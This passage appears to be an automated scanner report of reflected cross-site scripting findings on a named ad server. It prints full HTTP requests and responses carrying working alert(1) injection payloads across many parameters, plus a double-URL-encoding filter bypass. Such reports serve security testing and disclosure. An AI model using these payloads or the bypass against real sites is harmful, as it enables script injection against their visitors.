GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:17 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843277:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:17 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52705'-alert(1)-'5838e5807a8 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:45 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843305:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:45 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0a2'-alert(1)-'eddc83441b0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:59 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843319:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:59 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3646'-alert(1)-'9d3890ffc58 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:55 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843315:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:55 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d724'-alert(1)-'aba732753ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:41 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843301:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:41 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2488'-alert(1)-'0a19383e732 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:34 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843294:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bdf'-alert(1)-'051170363a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:42:04 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:42:04 GMT; path=/ Set-Cookie: i_1=33:353:516:141:0:45001:1303843324:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:42:04 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 855
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8654"-alert(1)-"c50bffdece4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610b1"-alert(1)-"b260c77153e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8199f"-alert(1)-"f38ee686c59 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba1a"-alert(1)-"c5e1d0c5d1a was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8 was submitted in the REST URL parameter 2. This input was echoed as c5ea9";alert(1)//3e6670df6b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408 was submitted in the REST URL parameter 3. This input was echoed as 5e00b";alert(1)//abbd6d3e408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:34 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a78"-alert(1)-"a549992a4e6 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf8a"-alert(1)-"17ee62d1a47 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 983cb"-alert(1)-"b33569e6d27 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
